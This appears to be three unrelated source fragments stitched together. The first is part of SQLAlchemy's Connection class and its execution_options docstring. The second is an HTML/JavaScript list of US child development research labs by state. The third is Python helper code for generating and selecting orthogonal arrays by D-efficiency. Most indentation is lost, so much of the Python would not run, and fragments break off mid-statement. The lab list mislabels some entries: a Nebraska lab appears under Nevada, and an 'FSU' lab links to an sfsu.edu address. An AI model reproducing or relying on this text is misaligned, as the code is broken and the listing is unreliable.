returned to the connection pool (i.e. ``connection.close()``) whenever the
connection is not in use.
.. index::
single: thread safety; Connection
"""
_is_future = False
_sqla_logger_namespace = "sqlalchemy.engine.Connection"
    def __init__(
        self,
        engine,
        connection=None,
        close_with_result=False,
        _branch_from=None,
        _execution_options=None,
        _dispatch=None,
        _has_events=None,
    ):
        """Construct a new Connection.

        Two construction paths: a *branched* connection (``_branch_from``
        set) copies state from its root connection and never closes with
        a result; a root connection checks out (or is handed) a DBAPI
        connection and joins the engine's event dispatch.
        """
        self.engine = engine
        self.dialect = engine.dialect
        self.__branch_from = _branch_from

        if _branch_from:
            # branching is always "from" the root connection
            assert _branch_from.__branch_from is None
            self._dbapi_connection = connection
            self._execution_options = _execution_options
            self._echo = _branch_from._echo
            self.should_close_with_result = False
            self.dispatch = _dispatch
            self._has_events = _branch_from._has_events
        else:
            # root connection: use the supplied DBAPI connection or check
            # one out from the engine's pool
            self._dbapi_connection = (
                connection
                if connection is not None
                else engine.raw_connection()
            )
            self._transaction = self._nested_transaction = None
            self.__savepoint_seq = 0
            self.__in_begin = False
            self.should_close_with_result = close_with_result

            self.__can_reconnect = True
            self._echo = self.engine._should_log_info()

            if _has_events is None:
                # if _has_events is sent explicitly as False,
                # then don't join the dispatch of the engine; we don't
                # want to handle any of the engine's events in that case.
                self.dispatch = self.dispatch._join(engine.dispatch)
            self._has_events = _has_events or (
                _has_events is None and engine._has_events
            )

            # root connections never receive pre-built execution options
            assert not _execution_options
            self._execution_options = engine._execution_options

        if self._has_events or self.engine._has_events:
            self.dispatch.engine_connect(self, _branch_from is not None)
@util.memoized_property
def _message_formatter(self):
if "logging_token" in self._execution_options:
token = self._execution_options["logging_token"]
return lambda msg: "[%s] %s" % (token, msg)
else:
return None
def _log_info(self, message, *arg, **kw):
fmt = self._message_formatter
if fmt:
message = fmt(message)
self.engine.logger.info(message, *arg, **kw)
def _log_debug(self, message, *arg, **kw):
fmt = self._message_formatter
if fmt:
message = fmt(message)
self.engine.logger.debug(message, *arg, **kw)
@property
def _schema_translate_map(self):
return self._execution_options.get("schema_translate_map", None)
def schema_for_object(self, obj):
"""Return the schema name for the given schema item taking into
account current schema translate map.
"""
name = obj.schema
schema_translate_map = self._execution_options.get(
"schema_translate_map", None
)
if (
schema_translate_map
and name in schema_translate_map
and obj._use_schema_map
):
return schema_translate_map[name]
else:
return name
def _branch(self):
"""Return a new Connection which references this Connection's
engine and connection; but does not have close_with_result enabled,
and also whose close() method does nothing.
.. deprecated:: 1.4 the "branching" concept will be removed in
SQLAlchemy 2.0 as well as the "Connection.connect()" method which
is the only consumer for this.
The Core uses this very sparingly, only in the case of
custom SQL default functions that are to be INSERTed as the
primary key of a row where we need to get the value back, so we have
to invoke it distinctly - this is a very uncommon case.
Userland code accesses _branch() when the connect()
method is called. The branched connection
acts as much as possible like the parent, except that it stays
connected when a close() event occurs.
"""
return self.engine._connection_cls(
self.engine,
self._dbapi_connection,
_branch_from=self.__branch_from if self.__branch_from else self,
_execution_options=self._execution_options,
_has_events=self._has_events,
_dispatch=self.dispatch,
)
def _generate_for_options(self):
"""define connection method chaining behavior for execution_options"""
if self._is_future:
return self
else:
c = self.__class__.__new__(self.__class__)
c.__dict__ = self.__dict__.copy()
return c
    def __enter__(self):
        """Support ``with connection:`` blocks; returns the connection itself."""
        return self
    def __exit__(self, type_, value, traceback):
        """Close the connection when the ``with`` block exits."""
        self.close()
def execution_options(self, **opt):
r""" Set non-SQL options for the connection which take effect
during execution.
For a "future" style connection, this method returns this same
:class:`_future.Connection` object with the new options added.
For a legacy connection, this method returns a copy of this
:class:`_engine.Connection` which references the same underlying DBAPI
connection, but also defines the given execution options which will
take effect for a call to
:meth:`execute`. As the new :class:`_engine.Connection` references the
same underlying resource, it's usually a good idea to ensure that
the copies will be discarded immediately, which is implicit if used
as in::
result = connection.execution_options(stream_results=True).\
execute(stmt)
Note that any key/value can be passed to
:meth:`_engine.Connection.execution_options`,
and it will be stored in the
``_execution_options`` dictionary of the :class:`_engine.Connection`.
It
is suitable for usage by end-user schemes to communicate with
event listeners, for example.
The keywords that are currently recognized by SQLAlchemy itself
include all those listed under :meth:`.Executable.execution_options`,
as well as others that are specific to :class:`_engine.Connection`.
:param autocommit: Available on: Connection, statement.
When True, a COMMIT will be invoked after execution
when executed in 'autocommit' mode, i.e. when an explicit
transaction is not begun on the connection. Note that this
is **library level, not DBAPI level autocommit**. The DBAPI
connection will remain in a real transaction unless the
"AUTOCOMMIT" isolation level is used.
.. deprecated:: 1.4 The "autocommit" execution option is deprecated
and will be removed in SQLAlchemy 2.0. See
:ref:`migration_20_autocommit` for discussion.
:param compiled_cache: Available on: Connection.
A dictionary where :class:`.Compiled` objects
will be cached when the :class:`_engine.Connection`
compiles a clause
expression into a :class:`.Compiled` object. This dictionary will
supersede the statement cache that may be configured on the
:class:`_engine.Engine` itself. If set to None, caching
is disabled, even if the engine has a configured cache size.
Note that the ORM makes use of its own "compiled" caches for
some operations, including flush operations. The caching
used by the ORM internally supersedes a cache dictionary
specified here.
:param logging_token: Available on: :class:`_engine.Connection`,
:class:`_engine.Engine`.
Adds the specified string token surrounded by brackets in log
messages logged by the connection, i.e. the logging that's enabled
either via the :paramref:`_sa.create_engine.echo` flag or via the
``logging.getLogger("sqlalchemy.engine")`` logger. This allows a
per-connection or per-sub-engine token to be available which is
useful for debugging concurrent connection scenarios.
.. versionadded:: 1.4.0b2
.. seealso::
:ref:`dbengine_logging_tokens` - usage example
:paramref:`_sa.create_engine.logging_name` - adds a name to the
name used by the Python logger object itself.
:param isolation_level: Available on: :class:`_engine.Connection`.
Set the transaction isolation level for the lifespan of this
:class:`_engine.Connection` object.
Valid values include those string
values accepted by the :paramref:`_sa.create_engine.isolation_level`
parameter passed to :func:`_sa.create_engine`. These levels are
semi-database specific; see individual dialect documentation for
valid levels.
The isolation level option applies the isolation level by emitting
statements on the DBAPI connection, and **necessarily affects the
original Connection object overall**, not just the copy that is
returned by the call to :meth:`_engine.Connection.execution_options`
method. The isolation level will remain at the given setting until
the DBAPI connection itself is returned to the connection pool, i.e.
the :meth:`_engine.Connection.close` method on the original
:class:`_engine.Connection` is called,
where an event handler will emit
additional statements on the DBAPI connection in order to revert the
isolation level change.
.. warning:: The ``isolation_level`` execution option should
**not** be used when a transaction is already established, that
is, the :meth:`_engine.Connection.begin`
method or similar has been
called. A database cannot change the isolation level on a
transaction in progress, and different DBAPIs and/or
SQLAlchemy dialects may implicitly roll back or commit
the transaction, or not affect the connection at all.
.. note:: The ``isolation_level`` execution option is implicitly
reset if the :class:`_engine.Connection` is invalidated, e.g. via
the :meth:`_engine.Connection.invalidate` method, or if | |
Cheerios</p>
<p><strong>A guided, online "give N" task is coming soon to Lookit!</strong></p>
<h4>Let your baby choose: understanding your infant's preferences</h4>
<p><img src="{settings.STATIC_URL}images/pacifier.png"></p>
<p><strong>Age range</strong>: 0 to 6 months</p>
<p><strong>What you'll need</strong>: A pacifier that your infant will suck on for about 15 minutes at a time and the operant conditioning web tool.</p>
<p>In this lab, you'll let your baby control what sound is played by sucking faster or slower on a pacifier. We recommend starting by trying to observe his or her preference for hearing music or a heartbeat. <a href="http://www.mit.edu/~kimscott/instructions.html">Instructions</a></p>
</div>
</div>
</div>
</div>"""
+ """
<script type="text/javascript">
var allLabs = {
"Alabama": [
{
'url': 'http://www.ches.ua.edu/hdfs/cdrc/',
'name': 'University of Alabama Child Development Research Center'
},
{
'url': 'http://monaelsheikh.com/',
'name': 'Auburn University Child Sleep, Health, and Development Lab'
}
],
"Alaska": [],
"Arizona": [
{
'url': 'http://web.arizona.edu/~tigger/',
'name': 'University of Arizona Child Cognition Lab (Tigger Lab)'
},
{
'url': 'http://web.arizona.edu/~tweety/',
'name': 'University of Arizona Language Development Lab (Tweety Lab)'
},
{
'url': 'http://nau.edu/SBS/IHD/Research/CDLL/',
'name': 'Northern Arizona University Child Development and Language Lab'
}
],
"Arkansas": [
{
'url': 'http://acnc.uamsweb.com/research-2/our-laboratories-2/early-diets-and-long-term-health-lab/',
'name': "Arkansas Children's Nutrition Center Growth and Development Laboratory"
}
],
"California": [
{
'url': 'http://www.csus.edu/indiv/a/alexanderk/lab.htm',
'name': 'CSU Sacramento Cognitive Development Lab'
},
{
'url': 'http://www-psych.stanford.edu/~babylab/',
'name': "Stanford's Center for Infant Studies"
},
{
'url': 'http://bungelab.berkeley.edu/participate/',
'name': 'UC Berkeley Building Blocks of Cognition Lab'
},
{
'url': 'http://babycenter.berkeley.edu/',
'name': 'UC Berkeley Infant Studies Center'
},
{
'url': 'http://psychology.berkeley.edu/participant-recruitment/rsvp-research-subject-volunteer-pool',
'name': 'UC Berkeley Psychology Department (list of studies)'
},
{
'url': 'http://oakeslab.ucdavis.edu/',
'name': 'UC Davis Infant Cognition Lab'
},
{
                'url': 'http://languagelearninglab.dss.ucdavis.edu/',
'name': 'UC Davis Language Learning Lab'
},
{
                'url': 'http://riveralab.ucdavis.edu/',
'name': 'UC Davis Neurocognitive Development Lab'
},
{
'url': 'http://www.cogsci.uci.edu/cogdev/information.html',
'name': 'UC Irvine Sarnecka Cognitive Development Lab'
},
{
'url': 'http://babytalk.psych.ucla.edu/home.htm',
'name': 'UCLA Language and Cognitive Development Lab'
},
{
'url': 'http://www.ccl.ucr.edu/',
'name': 'UC Riverside Childhood Cognition Lab'
},
{
'url': 'https://labs.psych.ucsb.edu/german/tamsin/',
'name': 'UCSB Cognition & Development Laboratory'
},
{
'url': 'http://www-cogsci.ucsd.edu/~deak/cdlab/',
'name': 'UCSD Cognitive Development Lab'
},
{
'url': 'http://dornsife.usc.edu/labs/mid-la/participate/',
'name': 'USC Minds in Development Lab'
}
],
"Colorado": [
{
'url': 'http://sleep.colorado.edu/',
'name': 'UC Boulder Sleep and Development Lab'
},
{
'url': 'http://www.ucdenver.edu/academics/colleges/medicalschool/departments/psychiatry/Research/developmentalresearch/Pages/Overview.aspx',
'name': 'University of Colorado Denver Developmental Psychiatry Research Group'
},
{
'url': 'http://www.du.edu/psychology/child_health_and_development/',
'name': 'University of Colorado Denver Child Health & Development Lab'
},
{
'url': 'http://psych.colorado.edu/~cdc/whoweare.htm',
'name': 'University of Colorado Denver Cognitive Development Center'
}
],
"Connecticut": [
{
'url': 'http://cogdev.research.wesleyan.edu/',
'name': 'Wesleyan University Cognitive Development Labs'
},
{
'url': 'http://infantandchild.yale.edu/',
'name': 'Yale Infant and Child Research'
},
{
'url': 'http://candlab.yale.edu/',
'name': 'Yale Clinical Affective Neuroscience & Development Lab'
},
{
'url': 'https://medicine.yale.edu/lab/mcpartland/',
'name': 'McPartland Lab at Yale - Clinical Neuroscience of Autism Spectrum Disorder'
}
],
"Delaware": [
{
'url': 'http://www.childsplay.udel.edu/',
'name': "University of Delaware Child's Play, Learning and Development Lab"
}
],
"Florida": [
{
'url': 'http://casgroup.fiu.edu/dcn/pages.php?id=3636',
'name': 'FIU Developmental Cognitive Neuroscience Lab'
},
{
'url': 'http://online.sfsu.edu/devpsych/fair/index.html',
'name': 'FSU Family Interaction Research Lab'
},
{
'url': 'http://psy2.fau.edu/~lewkowicz/cdlfau/default.htm',
'name': 'FAU Child Development Lab'
},
{
'url': 'http://infantlab.fiu.edu/Infant_Lab.htm',
'name': 'FIU Infant Development Lab'
}
],
"Georgia": [
{
'url': 'http://www.gcsu.edu/psychology/currentresearch.htm#Participate',
'name': 'Georgia College Psychology Department'
}
],
"Hawaii": [
{
'url': 'http://www.psychology.hawaii.edu/concentrations/developmental-psychology.html',
'name': 'University of Hawaii Developmental Psychology'
}
],
"Idaho": [],
"Illinois": [
{
'url': 'http://internal.psychology.illinois.edu/~acimpian/',
'name': 'University of Illinois Cognitive Development Lab'
},
{
'url': 'http://internal.psychology.illinois.edu/infantlab/',
'name': 'University of Illinois Infant Cognition Lab'
},
{
'url': 'http://bradfordpillow.weebly.com/cognitive-development-lab.html',
'name': 'Northern Illinois University Cognitive Development Lab'
},
{
'url': 'http://www.childdevelopment.northwestern.edu/',
'name': "Northwestern University's Project on Child Development"
},
{
'url': 'http://woodwardlab.uchicago.edu/Home.html',
'name': 'University of Chicago Infant Learning and Development Lab'
}
],
"Indiana": [
{
'url': 'http://www.iub.edu/~cogdev/',
'name': 'Indiana University Cognitive Development Lab'
},
{
'url': 'http://www.psych.iupui.edu/Users/kjohnson/cogdevlab/INDEX.HTM',
'name': 'IUPUI Cognitive Development Lab'
},
{
'url': 'http://www.evansville.edu/majors/cognitivescience/language.cfm',
'name': 'University of Evansville Language and Cognitive Development Laboratory'
}
],
"Iowa": [
{
'url': 'http://www.medicine.uiowa.edu/psychiatry/cognitivebraindevelopmentlaboratory/',
'name': 'University of Iowa Cognitive Brain Development Laboratory'
}
],
"Kansas": [
{
'url': 'http://www2.ku.edu/~lsi/labs/neurocognitive_lab/staff.shtml',
'name': 'KU Neurocognitive Development of Autism Research Laboratory'
},
{
'url': 'http://healthprofessions.kumc.edu/school/research/carlson/index.html',
'name': 'KU Maternal and Child Nutrition and Development Laboratory'
},
{
'url': 'http://greenhoot.wordpress.com/meet-the-research-team/',
'name': 'KU Memory and Development Lab'
}
],
"Minnesota": [
{
'url': 'http://www.cehd.umn.edu/icd/research/seralab/',
'name': 'University of Minnesota Language and Cognitive Development Lab'
},
{
'url': 'http://www.cehd.umn.edu/icd/research/cdnlab/',
'name': 'University of Minnesota Cognitive Development & Neuroimaging Lab'
},
{
'url': 'http://www.cehd.umn.edu/icd/research/carlson/',
'name': 'University of Minnesota Carlson Child Development Lab'
}
],
"Kentucky": [
{
'url': 'http://babythinker.org',
'name': 'University of Louisville Infant Cognition Lab'
},
{
'url': 'http://www.wku.edu/psychological-sciences/labs/cognitive_development/index.php',
'name': 'Western Kentucky University Cognitive Development Lab'
}
],
        "Louisiana": [],
"Maine": [
{
'url': 'http://people.usm.maine.edu/bthompso/Site/Development%20Lab.html',
'name': 'USM Human Development Lab'
},
{
'url': 'http://www.colby.edu/psychology/labs/cogdev1/LabAlumni.html',
'name': 'Colby Cognitive Development Lab'
}
],
"Maryland": [
{
'url': 'http://education.umd.edu/HDQM/labs/Fox/',
'name': 'University of Maryland Child Development Lab'
},
{
'url': 'http://ncdl.umd.edu/',
'name': 'University of Maryland Neurocognitive Development Lab'
}
],
"Massachusetts": [
{
'url': 'http://eccl.mit.edu/',
'name': 'MIT Early Childhood Cognition Lab'
},
{
'url': 'http://gablab.mit.edu/',
'name': 'MIT Gabrieli Lab'
},
{
'url': 'http://saxelab.mit.edu/people.php',
'name': 'MIT Saxelab Social Cognitive Neuroscience Lab'
},
{
'url': 'https://software.rc.fas.harvard.edu/lds/',
'name': 'Harvard Laboratory for Developmental Sciences'
},
{
'url': 'http://www.bu.edu/cdl/',
'name': 'Boston University Child Development Labs'
},
{
                'url': 'http://babies.umb.edu',
'name': 'UMass Boston Baby Lab'
},
{
'url': 'http://people.umass.edu/lscott/lab.htm',
'name': 'UMass Amherst Brain, Cognition, and Development Lab'
},
{
'url': 'http://www.northeastern.edu/berentlab/research/infant/',
'name': 'Northeastern Infant Phonology Lab'
}
],
"Michigan": [
{
'url': 'http://www.educ.msu.edu/content/default.asp?contentID=903',
'name': 'MSU Cognitive Development Lab'
},
{
'url': 'http://ofenlab.wayne.edu/people.php',
'name': 'Wayne State University Cognitive Brain Development Lab'
}
],
"Mississippi": [],
"Missouri": [
{
'url': 'http://www.artsci.wustl.edu/~children/',
'name': 'Washington University Cognition and Development Lab'
},
{
'url': 'http://mumathstudy.missouri.edu/#content',
'name': 'University of Missouri-Columbia Math Study'
}
],
"Montana": [
{
'url': 'http://hs.umt.edu/psychology/severson/',
                'name': 'The Minds Lab at University of Montana'
},
{
'url': 'http://www.montana.edu/wwwpy/brooker/html/meet.html',
'name': 'Montana State University DOME Lab'
}
],
"Nebraska": [
{
'url': 'http://www.boystownhospital.org/research/clinicalbehavioralstudies/Pages/LanguageDevelopmentLaboratory.aspx',
'name': 'Boys Town National Research Hospital Language Development Laboratory'
},
{
'url': 'http://research.unl.edu/dcn/',
'name': 'University of Nebraska-Lincoln Developmental Cognitive Neuroscience Laboratory'
}
],
"Nevada": [
{
'url': 'http://www.unl.edu/dbrainlab/',
'name': 'University of Nebraska-Lincoln Developmental Brain Lab'
}
],
"New Hampshire": [
{
'url': 'http://cola.unh.edu/news/frl',
'name': 'University of New Hampshire Family Research Lab'
}
],
"New Jersey": [
{
'url': 'http://www.shu.edu/academics/gradmeded/ms-speech-language-pathology/dlc-lab.cfm',
'name': 'Seton Hall University Developmental Language and Cognition Laboratory'
},
{
'url': 'http://www.ramapo.edu/sshs/childlab/',
'name': 'Ramapo College Child Development Lab'
},
{
'url': 'http://ruccs.rutgers.edu/~aleslie/',
'name': 'Rutgers University Cognitive Development Lab'
},
{
'url': 'http://babylab.rutgers.edu/HOME.html',
'name': 'Rutgers University Infancy Studies Lab'
},
{
'url': 'http://ruccs.rutgers.edu/languagestudies/people.html',
'name': 'Rutgers University Lab for Developmental Language Studies'
}
],
"New Mexico": [],
"New York": [
{
'url': 'http://www.columbia.edu/cu/needlab/',
'name': 'Columbia Neurocognition, Early Experience, and Development (NEED) Lab'
},
{
'url': 'https://www.facebook.com/pages/Child-Development-Lab-the-City-University-of-New-York/42978619994',
'name': 'CUNY Child Development Lab'
}
],
"North Carolina": [
{
'url': 'http://people.uncw.edu/nguyens/',
'name': 'UNCW Cognitive Development Lab'
}
],
"North Dakota": [
{
'url': 'http://www.cvcn.psych.ndsu.nodak.edu/labs/woods/',
'name': 'NDSU Infant Cognitive Development Lab'
}
],
"Ohio": [
{
'url': 'http://cogdev.cog.ohio-state.edu/',
'name': 'OSU Cognitive Development Lab'
},
{
'url': 'http://www.ohio.edu/chsp/rcs/csd/research/dplab.cfm',
'name': 'Ohio University Developmental Psycholinguistics Lab'
}
],
"Oklahoma": [],
"Oregon": [
{
'url': 'http://bdl.uoregon.edu/Participants/participants.php',
'name': 'University of Oregon Brain Development Lab'
},
{
'url': 'http://www.uolearninglab.com',
'name': 'University of Oregon Learning Lab'
}
],
"Pennsylvania": [
{
'url': 'http://www.temple.edu/infantlab/',
'name': 'Temple Infant & Child Lab'
},
{
'url': 'http://lncd.pitt.edu/wp/',
'name': 'University of Pittsburgh Laboratory of Neurocognitive Development'
},
{
'url': 'https://sites.sas.upenn.edu/cogdevlab/',
'name': 'UPenn Cognition & Development Lab'
},
{
'url': 'http://babylab.psych.psu.edu/',
'name': 'Penn State Brain Development Lab'
}
],
"Rhode Island": [
{
'url': 'http://www.brown.edu/Research/dcnl/',
'name': 'Brown University Developmental Cognitive Neuroscience Lab'
}
],
"South Carolina": [
{
'url': 'http://academicdepartments.musc.edu/joseph_lab/',
'name': 'MUSC Brain, Cognition, & Development Lab'
}
],
"South Dakota": [],
"Tennessee": [
{
'url': 'http://web.utk.edu/~infntlab/',
'name': 'UT Knoxville Infant Perception-Action Lab'
},
{
'url': 'http://peabody.vanderbilt.edu/departments/psych/research/research_labs/educational_cognitive_neuroscience_lab/index.php',
'name': 'Vanderbilt Educational Cognitive Neuroscience Lab'
}
],
"Texas": [
{
'url': 'http://www.ccdlab.net/',
'name': 'UT-Austin Culture, | |
pfig=None, cache=1, selectfullrank=0, basedir='/home/eendebakpt/oatmp/final/', oadir='/home/eendebakpt/misc/oa/oacode/'):
""" Helper function: extend a full series with D-efficiency selection """
datadir = basedir + \
'/oa%d-%d-t%d-small-fullrank%d' % (N, kfinal, t, selectfullrank)
if not os.path.exists(datadir):
os.mkdir(datadir)
os.chdir(datadir)
k = kfinal
m = 1 + k + k * (k - 1) / 2
s = oalib.intVector([2] * kfinal)
adata = oalib.arraydata_t(s, N, t, k)
if verbose:
print('generateABcase: case: %s, k %d, m %d' % (str(adata), k, m))
selectionmaxn = [1e9] * kfinal
adata.writeConfigFile('oaconfig.txt')
for ii in range(t, k + 1):
adatax = oalib.arraydata_t(adata, ii)
adatax.writeConfigFile('oaconfig%d.txt' % ii)
cmdlog = os.path.join(datadir, 'commandlog.txt')
cmdlogfid = open(cmdlog, 'w')
# Create root array
adata0 = oalib.arraydata_t(adata, t)
al = oalib.array_link(N, t, -1)
al.create_root(adata0)
sols = oalib.arraylist_t()
sols.append(al)
outfile = ('result-') + adata0.idstr() + '.oa'
oalib.writearrayfile(outfile, sols)
cmdlogfid.write('# Create root array, write to %s' % outfile)
# First analysis
extendInitial(datadir, adata, kstart, verbose=1, cache=1, cmdlog=cmdlogfid)
adata0 = oalib.arraydata_t(adata, kstart)
afile0 = os.path.join(datadir, 'result-' + adata0.idstr() + '.oa')
if verbose:
print(' initial file: %d solutions' % oalib.nArrays(afile0))
outfile = ('result-') + adata0.idstr() + '.oa'
anafile = analyseFile(outfile, method='full', verbose=1, cache=1)
anafile = anafile[1]
if 0:
data = ABhelper.loadAnalysisFile(anafile)
A = data[:, 1]
B = data[:, 2]
Acc = 1e-15**(1. / m)
idx = A > Acc
a = A[idx]
b = B[idx]
print(' initial file: max A %.3f, min B %.3f' %
(safemax(a), safemin(b)))
print(' initial: 95th percentile of A score: %.2f' %
np.percentile(a, 95))
kmax = kfinal
if 0:
plt.figure(2)
plt.clf()
bins = np.arange(0, 1, .025)
x = plt.hist(a.flatten(), bins)
plt.xlabel('A value')
plt.ylabel('Frequency')
Acurr = plotAthresholds(Afinal, kfinal, kstart)
print('selecting %d/%d arrays' % ((a > Acurr).sum(), a.size))
plt.legend(loc=2)
plt.title(r'Initial part of case %s' % adata.latexstr())
# init
k = kstart
adata0 = oalib.arraydata_t(adata, kstart)
outfile0 = ('result-') + adata0.idstr() + '.oa'
outfile = 'resultdynamic-' + adata0.idstr() + '.oa'
shutil.copyfile(outfile0, outfile)
averbose = 0
totaltime = 0
for kk in range(kstart, kfull):
# Initial input: show
k = kk
adata0 = oalib.arraydata_t(adata, k)
afile = os.path.join(
datadir, 'resultdynamic-' + adata0.idstr() + '.oa')
anafile = analyseFile(afile, verbose=1, cache=cache)
if 0:
data = ABhelper.loadAnalysisFile(anafile, ncols=1)
fig = drawAvalues(data, fig=100 + kk)
plotAthresholdsY(Afinal, kfinal)
print('level %d: %d arrays, Amax %.5f' %
(k, data.size, safemax(data, 0)))
# Calculate: k to k+1
kn = k + 1
adatan = oalib.arraydata_t(adata, kn)
nextfile = os.path.join(
datadir, 'resultdynamic-' + adatan.idstr() + '.oa')
logfile = nextfile.replace('.oa', '-log.txt')
cmd = dynamicExtendFile(afile, nextfile, kfinal=kfinal, Afinal=Afinal,
cmdlog=cmdlogfid, verbose=1, logfile=logfile, cache=cache)
dt = parseProcessingTime(logfile)
totaltime += dt
print('processing: %.0f [s], %.1f [h]' % (dt, float(dt) / 3600))
adata0 = oalib.arraydata_t(adata, kfull)
infile = 'resultdynamic-' + adata0.idstr() + '.oa'
nextfile = 'selecteddynamicresult-' + adata0.idstr() + '.oa'
shutil.copyfile(infile, nextfile)
# Prepare for selection rounds
for kk in range(kfull, kfinal):
if verbose:
print('# selection round %d->%d' % (kk, kk + 1))
k = kk
adata0 = oalib.arraydata_t(adata, k)
afile = os.path.join(
datadir, 'selecteddynamicresult-' + adata0.idstr() + '.oa')
outfile = 'selecteddynamic-' + adata0.idstr() + '.oa'
m = int(1 + adata0.ncols + adata0.ncols * (adata0.ncols - 1) / 2)
if checkFiles(outfile, cache=cache):
if verbose >= 3:
print(' skipping analysis')
cmdlogfid.write(
'# Select best [x] arrays, write to file %s\n\n' % (outfile))
else:
if selectfullrank:
anafiles = analyseFile(
afile, method='full', verbose=1, cache=cache)
data = loadAnalysisFile(anafiles[1])
a = data[:, 1]
r = data[:, 0]
ngoodrank = (r == m).sum()
ngoodrank2 = (a > 1e-10).sum()
if ngoodrank != ngoodrank2:
print(
'warning: rank calculation has numerical stability issues?')
else:
anafiles = analyseFile(
afile, verbose=1, method='full', cache=cache)
data = loadAnalysisFile(anafiles[1])
a = data[:, 1]
fig = drawAvalues(data, fig=100 + k)
plotAthresholdsY(Afinal, kfinal, k)
plt.title(r'Case $%s$: %d columns, selection' %
(adata.latexstr(), k))
if 1:
Dvals = data[:, 1]
Amax = oahelper.safemax(Dvals)
Amin = oahelper.safemin(Dvals)
# rr[kk]['Amax']=Amax
print(
'generateABcase: %d columns: Amax %.4f, Amin %4f', (kk, Amax, Amin))
if data.size > 0:
fraction = min(
max(float(selectionmaxn[k]) / data.size, .0001), 1)
else:
fraction = 1
inx = np.argsort(a.flatten())[::-1]
nn = int(np.ceil(fraction * a.size))
if selectfullrank:
if nn > ngoodrank and ngoodrank > 1:
v1 = a[inx[ngoodrank - 1]]
v2 = a[inx[ngoodrank]]
if verbose:
print(' good rank threshold: %e -> %e' % (v1, v2))
print(' good rank threshold: C %e -> %e' %
(v1**m, v2**m))
if selectfullrank:
if verbose:
print(' selectfullrank: reducing %d arrays to %d' %
(nn, ngoodrank))
nn = min(nn, ngoodrank)
if verbose:
print('final round %d columns: input %d arrays, reduced to %d' %
(k, data.size, nn))
if a.size > 0:
fig = drawAvalues(a[inx[0:nn]], fig=200 + k)
plt.title(r'Case $%s$: %d columns, selection, sorted' %
(adata.latexstr(), k))
ABhelper.selectArrays(afile, outfile, inx[0:nn], cache=cache)
# outfilerest = 'selecteddynamicrest-' + adata0.idstr() + '.oa'
# ABhelper.selectArrays(afile, outfilerest, inx[nn:], cache=cache)
cmdlogfid.write(
'# Select best %d arrays, write to file %s\n\n' % (nn, outfile))
kn = k + 1
adatan = oalib.arraydata_t(adata, kn)
nextfile = 'selecteddynamicresult-' + adatan.idstr() + '.oa'
logfile = nextfile.replace('.oa', '-log.txt')
cmd = dynamicExtendFile(outfile, nextfile, kfinal=kfinal, Afinal=Afinal,
verbose=1, cmdlog=cmdlogfid, logfile=logfile, cache=cache)
dt = parseProcessingTime(logfile)
totaltime += dt
print(
'processing: final step %.0f [s], %.1f [h]' % (dt, float(dt) / 3600))
afile = nextfile
adatan = oalib.arraydata_t(adata, kfinal)
anafiles = analyseFile(afile, method='full', verbose=1, cache=cache)
anafile = anafiles[1]
data = loadAnalysisFile(anafile, ncolshint=4)
A = data[:, 1]
B = data[:, 2]
rnk = data[:, 0]
Acc = 1e-15**(1. / m)
idx = A > Acc
a = A[idx]
b = B[idx]
k = adatan.ncols
m = 1 + k + k * (k - 1) / 2
nmaxrnk = (rnk == m).nonzero()[0].size
# Final selection ##
gidxmask = A >= Afinal
if selectfullrank:
print('selectfullrank: go! ')
# rnk.shape
# www=rnk
# A.shape
gidxmask = (A >= Afinal) * (rnk == m)
bidxmask = gidxmask == False
gidx = gidxmask.nonzero()[0]
bidx = bidxmask.nonzero()[0]
outfile = 'finalselection-' + adatan.idstr() + '-A%.2f' % Afinal + '.oa'
if gidx.size > 300:
afmode = oalib.ABINARY
else:
afmode = oalib.ATEXT
selectArrays(afile, outfile, gidx, verbose=1, cache=cache, afmode=afmode)
print('generateABcase: make VIF selection (non-generate)')
outfileVIF = 'finalselection-VIF-' + \
adatan.idstr() + '-A%.2f' % Afinal + '.oa'
Bc = B.copy()
Bc[Bc == 0] = np.inf
nmaxvif = min(80, B.nonzero()[0].size)
selectionArraysScore(
afile, outfileVIF, Bc, nmax=nmaxvif, order='ascending', cache=cache)
if 0:
ll = oapackage.readarrayfile(outfileVIF)
print('Bc==0\n')
print(Bc == 0)
print(np.abs(Bc) < 1e-5)
print(Bc)
idx = np.argsort(Bc.flatten())
print(idx)
print('--- written %s ------ (cache %d)\n' % (outfileVIF, cache))
oapackage.oainfo(afile)
oapackage.oainfo(outfileVIF)
for al in ll:
print(al.VIFefficiency())
if a.size > 0:
print('%d/%d arrays above threshold %.3f. max A value %.5f' %
(gidx.size, A.size, Afinal, a.max()))
else:
print('%d/%d arrays above threshold %.3f. max A value %.5f' %
(gidx.size, A.size, Afinal, 0))
rr = dict({'adata': adata, 'maxDeff': safemax(a), 'minB': safemin(b, np.inf), 'totaltime':
totaltime, 'nselected': gidx.size, 'narrays': A.size, 'outfile': outfile, 'datadir': datadir})
rr['outfileVIF'] = outfileVIF
rr['abscatterplot'] = None
rr['calcmode'] = selectfullrank
figfile = 'finalDAscatter.png'
if not pfig is None:
if 0:
fig = drawAvalues(data, fig=100)
if gidx.size > 0:
plt.plot(gidx, A[gidx], '.b')
if bidx.size > 0:
plt.plot(bidx, A[bidx], '.r')
figfile = 'finalselection.png'
plt.savefig(figfile)
plotABfigure(a, b, figid=100 + 1, verbose=1, fontsize=13)
plotABboundaries(Acc=Acc)
ss = adata.latexstr()
ss = ss.replace('\\OA', r'\mathrm{OA}')
plt.title(r'Scatterplot for $%s$' % ss, fontsize=18)
plt.savefig(figfile)
if verbose:
print('generating scatterplot: %s' % figfile)
if gidx.size > 20 and adata.strength < 4 and nmaxrnk > 0:
rr['abscatterplot'] = figfile
rr['datadir'] = datadir
rr['fullcalc'] = selectfullrank == 0 and Afinal == 0
sys.stdout.flush()
if Afinal == 0:
rr['mode'] = 'full'
else:
rr['mode'] = 'partial'
rr['specialcase'] = 0
rr['kstart'] = kstart
rr['Afinal'] = Afinal
rr['kfinal'] = kfinal
return rr
# Estimate total number of arrays
# %%
def tickfontsize(fontsize=14, ax=None):
    """ Set the font size for ticks on the x- and y-axis

    Args:
        fontsize (int): font size to apply to the major tick labels
        ax (matplotlib Axes or None): axis to modify; defaults to the
            current axis (``plt.gca()``)
    """
    if ax is None:
        ax = plt.gca()
    # ``Tick.label`` was deprecated and removed in matplotlib 3.8;
    # tick_params is the supported way to size major tick labels on both
    # axes in one call.
    ax.tick_params(axis='both', which='major', labelsize=fontsize)
    plt.draw()
# %%
def generateStatistics(afile, nbest=10, verbose=1, doprojef=0):
# FIXME: incomplete function
# data=...
# gma=...
data = []
ll = oalib.readarrayfile(afile)
data = np.zeros((len(ll), 5))
